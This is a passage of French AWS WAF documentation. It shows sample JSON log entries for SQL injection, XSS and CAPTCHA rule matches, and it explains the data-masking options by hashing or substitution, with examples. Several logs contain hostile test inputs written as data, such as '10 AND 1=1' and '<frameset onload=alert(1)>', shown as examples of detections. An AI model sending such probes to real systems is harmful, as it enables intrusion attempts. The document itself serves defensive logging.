      "args":"",
      "httpVersion":"HTTP/1.1",
      "httpMethod":"GET",
      "requestId":"EdzmlH5OCGYF1vQ="
   }
}
```

**Example Sortie du journal pour une règle qui s'est déclenchée lors SQLi de la détection (arrêt)**  

```
{
    "timestamp": 1576280412771,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:ap-southeast-2:111122223333:regional/webacl/STMTest/1EXAMPLE-2ARN-3ARN-4ARN-123456EXAMPLE",
    "terminatingRuleId": "STMTest_SQLi_XSS",
    "terminatingRuleType": "REGULAR",
    "action": "BLOCK",
    "terminatingRuleMatchDetails": [
        {
            "conditionType": "SQL_INJECTION",
            "sensitivityLevel": "HIGH",
            "location": "HEADER",
            "matchedData": [
                "10",
                "AND",
                "1"
            ]
        }
    ],
    "httpSourceName": "-",
    "httpSourceId": "-",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [],
    "httpRequest": {
        "clientIp": "1.1.1.1",
        "country": "AU",
        "headers": [
            {
                "name": "Host",
                "value": "localhost:1989"
            },
            {
                "name": "User-Agent",
                "value": "curl/7.61.1"
            },
            {
                "name": "Accept",
                "value": "*/*"
            },
            {
                "name": "x-stm-test",
                "value": "10 AND 1=1"
            }
        ],
        "uri": "/myUri",
        "args": "",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "rid"
    },
    "labels": [
        {
            "name": "value"
        }
    ]
}
```

**Example Sortie du journal pour une règle qui s'est déclenchée lors SQLi de la détection (non résiliable)**  

```
{
    "timestamp":1592357192516
    ,"formatVersion":1
    ,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9"
    ,"terminatingRuleId":"Default_Action"
    ,"terminatingRuleType":"REGULAR"
    ,"action":"ALLOW"
    ,"terminatingRuleMatchDetails":[]
    ,"httpSourceName":"-"
    ,"httpSourceId":"-"
    ,"ruleGroupList":[]
    ,"rateBasedRuleList":[]
    ,"nonTerminatingMatchingRules":
    [{
        "ruleId":"TestRule"
        ,"action":"COUNT"
        ,"ruleMatchDetails":
        [{
            "conditionType":"SQL_INJECTION"
            ,"sensitivityLevel": "HIGH"
            ,"location":"HEADER"
            ,"matchedData":[
                "10"
                ,"and"
                ,"1"]
            }]
    }]
    ,"httpRequest":{
        "clientIp":"3.3.3.3"
        ,"country":"US"
        ,"headers":[
            {"name":"Host","value":"localhost:1989"}
            ,{"name":"User-Agent","value":"curl/7.61.1"}
            ,{"name":"Accept","value":"*/*"}
            ,{"name":"myHeader","myValue":"10 AND 1=1"}
            ]
            ,"uri":"/myUri","args":""
            ,"httpVersion":"HTTP/1.1"
            ,"httpMethod":"GET"
            ,"requestId":"rid"
    },
    "labels": [
        {
            "name": "value"
        }
    ]
}
```

**Example Sortie du journal pour plusieurs règles déclenchées au sein d'un groupe de règles (Rulea-XSS se termine et Rule-B ne se termine pas)**  

```
{
    "timestamp":1592361810888,
    "formatVersion":1,
    "webaclId":"arn:aws:wafv2:us-east-1:123456789012:global/webacl/hello-world/5933d6d9-9dde-js82-v8aw-9ck28nv9"
    ,"terminatingRuleId":"RG-Reference"
    ,"terminatingRuleType":"GROUP"
    ,"action":"BLOCK",
    "terminatingRuleMatchDetails":
    [{
        "conditionType":"XSS"
        ,"location":"HEADER"
        ,"matchedData":["<","frameset"]
    }]
    ,"httpSourceName":"-"
    ,"httpSourceId":"-"
    ,"ruleGroupList":
    [{
        "ruleGroupId":"arn:aws:wafv2:us-east-1:123456789012:global/rulegroup/hello-world/c05lb698-1f11-4m41-aef4-99a506d53f4b"
        ,"terminatingRule":{
            "ruleId":"RuleA-XSS"
            ,"action":"BLOCK"
            ,"ruleMatchDetails":null
            }
        ,"nonTerminatingMatchingRules":
        [{
            "ruleId":"RuleB-SQLi"
            ,"action":"COUNT"
            ,"ruleMatchDetails":
            [{
                "conditionType":"SQL_INJECTION"
                ,"sensitivityLevel": "LOW"
                ,"location":"HEADER"
                ,"matchedData":[
                    "10"
                    ,"and"
                    ,"1"]
            }]
        }]
        ,"excludedRules":null
    }]
    ,"rateBasedRuleList":[]
    ,"nonTerminatingMatchingRules":[]
    ,"httpRequest":{
        "clientIp":"3.3.3.3"
        ,"country":"US"
        ,"headers":
        [
            {"name":"Host","value":"localhost:1989"}
            ,{"name":"User-Agent","value":"curl/7.61.1"}
            ,{"name":"Accept","value":"*/*"}
            ,{"name":"myHeader1","value":"<frameset onload=alert(1)>"}
            ,{"name":"myHeader2","value":"10 AND 1=1"}
            ]
        ,"uri":"/myUri"
        ,"args":""
        ,"httpVersion":"HTTP/1.1"
        ,"httpMethod":"GET"
        ,"requestId":"rid"
    },
    "labels": [
        {
            "name": "value"
        }
    ]
}
```

**Example Sortie du journal pour une règle déclenchée pour l'inspection du corps de la demande avec le type de contenu JSON**  
AWS WAF indique actuellement l'emplacement de l'inspection du corps JSON sous la forme`UNKNOWN`.  

```
{
    "timestamp": 1576280412771,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:ap-southeast-2:123456789012:regional/webacl/test/111",
    "terminatingRuleId": "STMTest_SQLi_XSS",
    "terminatingRuleType": "REGULAR",
    "action": "BLOCK",
    "terminatingRuleMatchDetails": [
        {
            "conditionType": "SQL_INJECTION",
            "sensitivityLevel": "LOW",
            "location": "UNKNOWN",
            "matchedData": [
                "10",
                "AND",
                "1"
            ]
        }
    ],
    "httpSourceName": "ALB",
    "httpSourceId": "alb",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [],
    "requestHeadersInserted":null,
    "responseCodeSent":null,
    "httpRequest": {
        "clientIp": "1.1.1.1",
        "country": "AU",
        "headers": [],
        "uri": "",
        "args": "",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "POST",
        "requestId": "null"
    },
    "labels": [
        {
            "name": "value"
        }
    ]
}
```

**Example Sortie du journal pour une règle CAPTCHA par rapport à une requête Web avec un jeton CAPTCHA valide et non expiré**  
La liste de journaux suivante concerne une requête Web correspondant à une règle et à une CAPTCHA action. La requête Web contient un jeton CAPTCHA valide et non expiré, et elle est uniquement notée comme une correspondance CAPTCHA par AWS WAF, de la même manière que le comportement de l'action. Count Cette correspondance CAPTCHA est indiquée ci-dessous. `nonTerminatingMatchingRules`  

```
{
  "timestamp": 1632420429309,
  "formatVersion": 1,
  "webaclId": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/captcha-web-acl/585e38b5-afce-4d2a-b417-14fb08b66c67",
  "terminatingRuleId": "Default_Action",
  "terminatingRuleType": "REGULAR",
  "action": "ALLOW",
  "terminatingRuleMatchDetails": [],
  "httpSourceName": "APIGW",
  "httpSourceId": "123456789012:b34myvfw0b:pen-test",
  "ruleGroupList": [],
  "rateBasedRuleList": [],
  "nonTerminatingMatchingRules": [
    {
      "ruleId": "captcha-rule",
      "action": "CAPTCHA",
      "ruleMatchDetails": [],
      "captchaResponse": {
        "responseCode": 0,
        "solveTimestamp": 1632420429
      }
    }
  ],
  "requestHeadersInserted": [
    {
      "name": "x-amzn-waf-test-header-name",
      "value": "test-header-value"
    }
  ],
  "responseCodeSent": null,
  "httpRequest": {
    "clientIp": "72.21.198.65",
    "country": "US",
    "headers": [
      {
        "name": "X-Forwarded-For",
        "value": "72.21.198.65"
      },
      {
        "name": "X-Forwarded-Proto",
        "value": "https"
      },
      {
        "name": "X-Forwarded-Port",
        "value": "443"
      },
      {
        "name": "Host",
        "value": "b34myvfw0b.gamma.execute-api.us-east-1.amazonaws.com"
      },
      {
        "name": "X-Amzn-Trace-Id",
        "value": "Root=1-614cc24d-5ad89a09181910c43917a888"
      },
      {
        "name": "cache-control",
        "value": "max-age=0"
      },
      {
        "name": "sec-ch-ua",
        "value": "\"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\""
      },
      {
        "name": "sec-ch-ua-mobile",
        "value": "?0"
      },
      {
        "name": "sec-ch-ua-platform",
        "value": "\"Windows\""
      },
      {
        "name": "upgrade-insecure-requests",
        "value": "1"
      },
      {
        "name": "user-agent",
        "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36"
      },
      {
        "name": "accept",
        "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
      },
      {
        "name": "sec-fetch-site",
        "value": "same-origin"
      },
      {
        "name": "sec-fetch-mode",
        "value": "navigate"
      },
      {
        "name": "sec-fetch-user",
        "value": "?1"
      },
      {
        "name": "sec-fetch-dest",
        "value": "document"
      },
      {
        "name": "referer",
        "value": "https://b34myvfw0b.gamma.execute-api.us-east-1.amazonaws.com/pen-test/pets"
      },
      {
        "name": "accept-encoding",
        "value": "gzip, deflate, br"
      },
      {
        "name": "accept-language",
        "value": "en-US,en;q=0.9"
      },
      {
        "name": "cookie",
        "value": "aws-waf-token=51c71352-41f5-4f6d-b676-c24907bdf819:EQoAZ/J+AAQAAAAA:t9wvxbw042wva7E2Y6lgud/bS6YG0CJKVAJqaRqDZ140ythKW0Zj9wKB2O8lSkYDRqf1yONcVBFo5u0eYi0tvT4rtQCXsu+KanAardW8go4QSLw4yoED59lgV7oAhGyCalAzE7ra29j+RvvZPsQyoQuDCrtoY/TvQyMTXIXzGPDC/rKBbg=="
      }
    ],
    "uri": "/pen-test/pets",
    "args": "",
    "httpVersion": "HTTP/1.1",
    "httpMethod": "GET",
    "requestId": "GINMHHUgoAMFxug="
  }
}
```

**Example Sortie du journal pour une règle CAPTCHA par rapport à une requête Web qui ne contient pas de jeton CAPTCHA**  
La liste de journaux suivante concerne une requête Web correspondant à une règle et à une CAPTCHA action. La requête Web ne comportait pas de jeton CAPTCHA et a été bloquée par. AWS WAF  

```
{
  "timestamp": 1632420416512,
  "formatVersion": 1,
  "webaclId": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/captcha-web-acl/585e38b5-afce-4d2a-b417-14fb08b66c67",
  "terminatingRuleId": "captcha-rule",
  "terminatingRuleType": "REGULAR",
  "action": "CAPTCHA",
  "terminatingRuleMatchDetails": [],
  "httpSourceName": "APIGW",
  "httpSourceId": "123456789012:b34myvfw0b:pen-test",
  "ruleGroupList": [],
  "rateBasedRuleList": [],
  "nonTerminatingMatchingRules": [],
  "requestHeadersInserted": null,
  "responseCodeSent": 405,
  "httpRequest": {
    "clientIp": "72.21.198.65",
    "country": "US",
    "headers": [
      {
        "name": "X-Forwarded-For",
        "value": "72.21.198.65"
      },
      {
        "name": "X-Forwarded-Proto",
        "value": "https"
      },
      {
        "name": "X-Forwarded-Port",
        "value": "443"
      },
      {
        "name": "Host",
        "value": "b34myvfw0b.gamma.execute-api.us-east-1.amazonaws.com"
      },
      {
        "name": "X-Amzn-Trace-Id",
        "value": "Root=1-614cc240-18b57ff33c10e5c016b508c5"
      },
      {
        "name": "sec-ch-ua",
        "value": "\"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\""
      },
      {
        "name": "sec-ch-ua-mobile",
        "value": "?0"
      },
      {
        "name": "sec-ch-ua-platform",
        "value": "\"Windows\""
      },
      {
        "name": "upgrade-insecure-requests",
        "value": "1"
      },
      {
        "name": "user-agent",
        "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.54 Safari/537.36"
      },
      {
        "name": "accept",
        "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
      },
      {
        "name": "sec-fetch-site",
        "value": "cross-site"
      },
      {
        "name": "sec-fetch-mode",
        "value": "navigate"
      },
      {
        "name": "sec-fetch-user",
        "value": "?1"
      },
      {
        "name": "sec-fetch-dest",
        "value": "document"
      },
      {
        "name": "accept-encoding",
        "value": "gzip, deflate, br"
      },
      {
        "name": "accept-language",
        "value": "en-US,en;q=0.9"
      }
    ],
    "uri": "/pen-test/pets",
    "args": "",
    "httpVersion": "HTTP/1.1",
    "httpMethod": "GET",
    "requestId": "GINKHEssoAMFsrg="
  },
  "captchaResponse": {
    "responseCode": 405,
    "solveTimestamp": 0,
    "failureReason": "TOKEN_MISSING"
  }
}
```

# Protection des données
<a name="data-protection-masking"></a>

AWS WAF les paramètres de protection des données vous permettent de mettre en œuvre une protection personnalisée et granulaire des informations sensibles (mots de passe, clés d'API, jetons d'authentification et autres données confidentielles) sur des champs de données spécifiques tels que les en-têtes, les paramètres et le corps du texte.

Vous pouvez configurer la protection des données de l'une des manières suivantes :
+ Le niveau du pack de protection (ACL Web), qui s'applique à toutes les destinations de sortie.
+ Journalisation uniquement, qui n'affecte que les données AWS WAF envoyées à la destination de journalisation configurée. 

La protection des données peut être spécifiée sous forme de substitution ou de hachage. 

La substitution consiste à remplacer le contenu par le mot`REDACTED`. 

 Le hachage fait référence au remplacement du contenu, de la chaîne au binaire SHA-256 en Base64 :

1. Tout d'abord, l'algorithme crée une chaîne à partir de account\$1number et content.

1. Il applique ensuite SHA-256 pour produire un hachage binaire.

1. Enfin, il code ces octets en utilisant Base64.

**Astuce**  
 Vous devez examiner les caractéristiques du hachage SHA-256 pour déterminer s'il répond à vos exigences avant de sélectionner la méthode de protection des données appropriée. Nous vous déconseillons de vous fier au hachage SHA-256 si vous souhaitez obtenir un résultat équivalent au chiffrement ou à la tokenisation.

**Topics**
+ [Permettre la protection des données](enable-protection.md)
+ [Exceptions de protection des données](data-protection-exceptions.md)
+ [Limites de protection des données](data-protection-limitations.md)
+ [Exemples de protection des données](data-protection-examples.md)
+ [Configuration de la protection des données pour un pack de protection (ACL Web)](data-protection-configure.md)

# Permettre la protection des données
<a name="enable-protection"></a>

Cette section explique les options de protection des données et de configuration des journaux que vous pouvez sélectionner dans la console. Vous pouvez protéger les données qui apparaissent dans les journaux en activant la protection des données dans certains champs. La protection des données peut être appliquée pour transformer les informations sensibles en différents types de sorties, notamment des journaux complets, des exemples de demandes et Security Lake.

**Pour activer la protection des données dans la AWS WAF console**

Accédez à la page **des packs de protection (Web ACLs)** de la console pour **activer les paramètres de protection**. Pour activer la protection des données pour vos journaux, choisissez de l'appliquer à tous les journaux ou à une destination de journalisation spécifique. Pour plus d'informations, consultez [Champs de journal pour le trafic du pack de protection (ACL Web)](logging-fields.md).

**Note**  
Il n'est pas nécessaire d'activer la journalisation pour appliquer la protection des données à l'ensemble de la journalisation. La protection des données sera appliquée à toutes les destinations de sortie, que la journalisation soit activée ou non. 

Au bas de la page **Activer les paramètres de protection**, sélectionnez le bouton **Ajouter un champ dans** le panneau des **champs de protection des données**. Sélectionnez le type de champ dans le menu déroulant. Pour plus d'informations sur la manière dont les données de chaque champ sont protégées par la protection des données, consultez le tableau ci-dessous.


| Type de champ | Détails | 
| --- | --- | 
|  `Single header`  |  Transformez définitivement la valeur de la clé d'en-tête spécifiée en fonction de l'option spécifiée (hachage ou substitution). La valeur transformée sera également reflétée dans les journaux complets.  | 
|  `Body`  |  Transforme définitivement la valeur corporelle. Applicable uniquement pour les `RuleMatchDetails` articles figurant dans le journal.  | 
|  `Query string`  |  Transformez définitivement la chaîne de requête en fonction de l'option spécifiée (hachage ou substitution). La valeur transformée sera également reflétée dans les journaux complets.  | 
|  `Single query argument`  |  Transformez définitivement la valeur de l'argument de requête spécifiée en fonction de l'option spécifiée (hachage ou substitution). La valeur transformée sera également reflétée dans les journaux complets.  | 
|  `Single cookie`  |  Transformez définitivement la valeur du cookie en fonction de l'option spécifiée (hachage ou substitution). La valeur transformée sera également reflétée dans les journaux complets.  | 

# Exceptions de protection des données
<a name="data-protection-exceptions"></a>

Lorsqu'elle est activée, la protection des données s'applique aux champs sur lesquels elle est activée, notamment `RuleMatchDetails` et`rateBasedRuleList`. Cependant, dans certains cas, vous souhaiterez peut-être inclure les données et le contenu protégés dans `RuleMatchDetails` et `rateBasedRuleList` à des fins de résolution des problèmes et de visibilité. Dans ces scénarios, vous pouvez spécifier des exceptions à la protection des données pour ce champ.
+ **`ExcludeRuleMatchDetails`**: Si vous spécifiez cette exception pour un champ spécifique, la valeur du champ `RuleMatchDetails` sera affichée et ne sera pas couverte par la protection des données. 
+ **`ExcludeRateBasedDetails`**: Si vous spécifiez cette exception pour un champ spécifique, la valeur du champ `rateBasedRuleList` sera affichée et ne sera pas couverte par la protection des données.

  Exemple : La `ExcludeRateBasedDetails` règle est activée sur **SINGLE\$1HEADER et **HEADER\$1NAME**** pour « dogname ».

  Si aucune exception n'est appliquée à la règle, la valeur de « dogname » apparaîtra sous la forme. `REDACTED`

  ```
  "rateBasedRuleList":[ {"rateBasedRuleId": ...,
                          "rateBasedRuleName":"RateBasedRule", "limitKey":"CUSTOMKEYS",
                          "maxRateAllowed":100, "evaluationWindowSec":"120", "customValues":[
                          {"key":"HEADER", "name":"dogname", "value":"REDACTED" } ] } ]
  ```

  Si une exception est activée sur la règle, la valeur « dogname » apparaîtra dans le journal.

  ```
   "rateBasedRuleList":[ {"rateBasedRuleId": ...,
                          "rateBasedRuleName":"RateBasedRule", "limitKey":"CUSTOMKEYS",
                          "maxRateAllowed":100, "evaluationWindowSec":"120", "customValues":[
                          {"key":"HEADER", "name":"dogname", "value":"ELLA" } ] } ]
  ```

**Avertissement**  
La fonction de protection des données peut potentiellement affecter les AWS WAF capacités de dépannage. Ces paramètres peuvent entraîner des comportements de détection et d'atténuation inattendus. Limitez la protection des données pour des paramètres spécifiques à ceux qui sont absolument nécessaires.

# Limites de protection des données
<a name="data-protection-limitations"></a>

Les limites suivantes sont à prendre en compte lors de l'utilisation de la protection des données.

## QueryString et SingleQueryArg
<a name="queries"></a>

**QueryString Protection**
+ La protection des données activée `QueryString` s'applique à tous les arguments de requête, substituting/hashing qu'il s'agisse des clés ou des valeurs, conformément aux paramètres spécifiés.

**QueryString dans les `RuleMatch` détails et les listes de `RateBased` règles**
+ Si la protection des données est appliquée à un argument de requête unique, la chaîne de requête complète figurera substituted/hashed dans la `RateBasedRule` section `RuleMatchDetails` et des journaux complets.
+ Si différentes méthodes de protection sont spécifiées (substitution et hachage) dans plusieurs arguments de requête unique, la méthode la plus stricte, la substitution, sera appliquée à l'ensemble de la chaîne de requête dans la `RateBasedRule` section `RuleMatchDetails` et dans les journaux complets.

## Cookies
<a name="cookies"></a>

**Note**  
 La protection des données ne s'applique aux valeurs du cookie que lorsque le cookie d'en-tête unique est protégé. 

**Cookie unique `RuleMatchDetails` et `RateBasedRule` listes**
+ Si la protection des données est appliquée à un seul cookie, l'intégralité de l'en-tête du cookie figurera substituted/hashed dans la `RateBasedRule` section `RuleMatchDetails` et des journaux complets.
+ Si différentes méthodes de protection sont spécifiées (substitution et hachage), la méthode la plus stricte, la substitution, sera appliquée à l'ensemble du cookie dans la `RateBasedRule` section `RuleMatchDetails` et des journaux complets.

# Exemples de protection des données
<a name="data-protection-examples"></a>

Cette section fournit des exemples de journalisation de la protection des données du trafic du pack de protection (ACL Web).

## DataProtection hachage
<a name="dataprotection-hashing"></a>

Configuration de Webacl

```
"data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "SINGLE_QUERY_ARGUMENT",
                        "field_keys": [
                            "hoppy"
                        ]
                    },
                    "action": "HASH",
                    "exclude_rule_match_details": false,
                    "exclude_rate_based_details": false
                }
             ]
           }
```

Exemple DataProtection de hachage : entrée de journal avec l' SingleQuery argument « hoppy » protégée.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [{
        "ruleId": "ProtectedSQLIHeadersVisibleInSTM",
        "action": "COUNT",
        "ruleMatchDetails": [{
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "SINGLE_QUERY_ARG",
                "matchedData": [ "z6hpYAFaMYdtiTeHhxnN5ydgRE5E1WgyVIdgqH0D3iM=" ],
                "matchedFieldName": "hoppy"
        }]
    }],
"requestHeadersInserted": null,
"responseCodeSent": null,
"httpRequest": {
    "clientIp": "54.239.98.137",
    "country": "US",
    "headers": [{
        "name": "X-Forwarded-For",
        "value": "54.239.98.137"
    }, {
        "name": "X-Forwarded-Proto",
        "value": "https"
    }, {
        "name": "X-Forwarded-Port",
        "value": "443"
    }, {
        "name": "Host",
        "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
    }, {
        "name": "X-Amzn-Trace-Id",
        "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
    }, {
        "name": "Accept-Encoding",
        "value": "gzip"
    }, {
        "name": "User-Agent",
        "value": "okhttp/3.12.1"
    }],
    "uri": "/CanaryTest",
    "args": "hoppy=z6hpYAFaMYdtiTeHhxnN5ydgRE5E1WgyVIdgqH0D3iM=&yellow=hello&x-hoppy-extra=generic-%3Cwords%3E-in-angle-brackets",
    "httpVersion": "HTTP/1.1",
    "httpMethod": "GET",
    "requestId": "FepO0F8fIAMEqoQ="
},
"labels": [{
    "name": "awswaf:forwardedip:geo:country:US"
}, {
    "name": "awswaf:forwardedip:geo:region:US-VA"
}]
}
```

## DataProtection substitution
<a name="dataprotection-substitution"></a>

Config Webcal

```
"data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "SINGLE_QUERY_ARGUMENT",
                        "field_keys": [
                            "hoppy"
                        ]
                    },
                    "action": "SUBSTITUTION",
                    "exclude_rule_match_details": false,
                    "exclude_rate_based_details": false
                }
             ]
           }
```

Exemple DataProtection de substitution : entrée de journal avec l'argument de requête unique « hoppy » protégé

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": []
"requestHeadersInserted": null,
"responseCodeSent": null,
"httpRequest": {
    "clientIp": "54.239.98.137",
    "country": "US",
    "headers": [{
        "name": "X-Forwarded-For",
        "value": "54.239.98.137"
    }, {
        "name": "X-Forwarded-Proto",
        "value": "https"
    }, {
        "name": "X-Forwarded-Port",
        "value": "443"
    }, {
        "name": "Host",
        "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
    }, {
        "name": "X-Amzn-Trace-Id",
        "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
    }, {
        "name": "Accept-Encoding",
        "value": "gzip"
    }, {
        "name": "User-Agent",
        "value": "okhttp/3.12.1"
    }],
    "uri": "/CanaryTest",
    "args": "hoppy=REDACTED&yellow=hello&x-hoppy-extra=generic-%3Cwords%3E-in-angle-brackets",
    "httpVersion": "HTTP/1.1",
    "httpMethod": "GET",
    "requestId": "FepO0F8fIAMEqoQ="
},
"labels": [{
    "name": "awswaf:forwardedip:geo:country:US"
}, {
    "name": "awswaf:forwardedip:geo:region:US-VA"
}]
}
```

## Conservation des données dans RuleMatchDetails
<a name="rulematchdetails-retain-data"></a>

Configuration de Webacl

```
"data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "SINGLE_HEADER",
                        "field_keys": [
                            "hoppy"
                        ]
                    },
                    "action": "HASH",
                    "exclude_rule_match_details": true,
                    "exclude_rate_based_details": false
                }
             ]
           }
```

Exemple de conservation des données dans RuleMatchDetails : entrée de journal protégée par un seul `Header` « hoppy », mais la valeur n'est conservée que dans`RuleMatchDetails`.

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [{
        "ruleId": "ProtectedSQLIHeadersVisibleInSTM",
        "action": "COUNT",
        "ruleMatchDetails": [{
                "conditionType": "SQL_INJECTION",
                "sensitivityLevel": "HIGH",
                "location": "HEADER",
                "matchedData": [ "10", "AND", "1" ],
                "matchedFieldName": "hoppy"
        }]
    }],
"requestHeadersInserted": null,
"responseCodeSent": null,
"httpRequest": {
    "clientIp": "54.239.98.137",
    "country": "US",
    "headers": [{
        "name": "X-Forwarded-For",
        "value": "54.239.98.137"
    }, {
        "name": "X-Forwarded-Proto",
        "value": "https"
    }, {
        "name": "X-Forwarded-Port",
        "value": "443"
    }, {
        "name": "Host",
        "value": "xt7xxx9bhn7.gamma.execute-api.us-east-1.amazonaws.com"
    }, {
        "name": "X-Amzn-Trace-Id",
        "value": "Root=1-67a288c4-27acb3cd5795dd8456b7e3c3"
    }, {
        "name": "hoppy",
        "value": "zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE="
    }, {
        "name": "Accept-Encoding",
        "value": "gzip"
    }, {
        "name": "User-Agent",
        "value": "okhttp/3.12.1"
    }, {
        "name": "hoppy",
        "value": "z6hpYAFaMYdtiTeHhxnN5ydgRE5E1WgyVIdgqH0D3iM="
    }],
    "uri": "/CanaryTest",
    "args": "happy=true",
    "httpVersion": "HTTP/1.1",
    "httpMethod": "GET",
    "requestId": "FepO0F8fIAMEqoQ="
},
"labels": [{
    "name": "awswaf:forwardedip:geo:country:US"
}, {
    "name": "awswaf:forwardedip:geo:region:US-VA"
}]
}
```

## Conservation des données dans rateBasedRule
<a name="ratebasedrule-retain-data"></a>

```
 "data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "SINGLE_HEADER",
                        "field_keys": [
                            "hoppy"
                        ]
                    },
                    "action": "HASH",
                    "exclude_rule_match_details": false,
                    "exclude_rate_based_details": true
                }
             ]
           }
```

Exemple de conservation des données dans une rateBasedRule liste : entrée de journal avec le seul `Header` « hoppy » protégé mais la valeur n'est conservée que dans `rateBasedRuleList`

```
{
    "timestamp": 1683355579981,
    "formatVersion": 1,
    "webaclId": ...,
    "terminatingRuleId": "RateBasedRule",
    "terminatingRuleType": "RATE_BASED",
    "action": "BLOCK",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "EXAMPLE11:rjvegx5guh:CanaryTest",
    "ruleGroupList": [],
    "rateBasedRuleList": [{
        "rateBasedRuleId": ...,
        "rateBasedRuleName": "RateBasedRule",
        "limitKey": "CUSTOMKEYS",
        "maxRateAllowed": 100,
        "evaluationWindowSec": "120",
        "customValues": [{
            "key": "HEADER",
            "name": "hoppy",
            "value": "ella"
        }]
    }],
    "nonTerminatingMatchingRules": [],
    "requestHeadersInserted": null,
    "responseCodeSent": null,
    "httpRequest": {
        "clientIp": "52.46.82.45",
        "country": "FR",
        "headers": [{
            "name": "X-Forwarded-For",
            "value": "52.46.82.45"
        }, {
            "name": "X-Forwarded-Proto",
            "value": "https"
        }, {
            "name": "X-Forwarded-Port",
            "value": "443"
        }, {
            "name": "Host",
            "value": "rjvegx5guh.execute-api.eu-west-3.amazonaws.com"
        }, {
            "name": "X-Amzn-Trace-Id",
            "value": "Root=1-645566cf-7cb058b04d9bb3ee01dc4036"
        }, {
            "name": "hoppy",
            "value": "zuomr2mxQxofg6EI6f7hMNGaJhhPxt0rFVAXog6FLxE="
        }, {
            "name": "User-Agent",
            "value": "RateBasedRuleTestKoipOneKeyModulePV2"
        }, {
            "name": "Accept-Encoding",
            "value": "gzip,deflate"
        }],
        "uri": "/CanaryTest",
        "args": "",
        "httpVersion": "HTTP/1.1",
        "httpMethod": "GET",
        "requestId": "Ed0AiHF_CGYF-DA="
    }
}
```

## Protection des données pour Body
<a name="dataprotection-body"></a>

AWS WAF enregistre uniquement les sous-ensembles de Body in. `RuleMatchDetails`

Configuration de Webacl

```
 "data_protection_config": {
            "data_protections": [
                {
                    "field": {
                        "field_type": "BODY"
                    },
                    "action": "SUBSTITUTE",
                    "exclude_rule_match_details": false,
                    "exclude_rate_based_details": false
                }
             ]
           }
```

Exemple DataProtection pour Body : entrée de journal avec Body Subsituted. `ruleMatchDetails`

```
{
    "timestamp": 1738705092889,
    "formatVersion": 1,
    "webaclId": "arn:aws:wafv2:us-east-1:111122223333:regional/webacl/DataProtectionhashACL/4eede063-e611-44f5-b357-ffc9d7b7fed5",
    "terminatingRuleId": "Default_Action",
    "terminatingRuleType": "REGULAR",
    "action": "ALLOW",
    "terminatingRuleMatchDetails": [],
    "httpSourceName": "APIGW",
    "httpSourceId": "746533260405:xt7v59bhn7:ABC",
    "ruleGroupList": [],
    "rateBasedRuleList": [],
    "nonTerminatingMatchingRules": [{
        "ruleId": "ProtectedSQLIBody",
        "action": "COUNT",
        "ruleMatchDetails": [{
            "conditionType": "SQL_INJECTION",
            "sensitivityLevel": "HIGH",
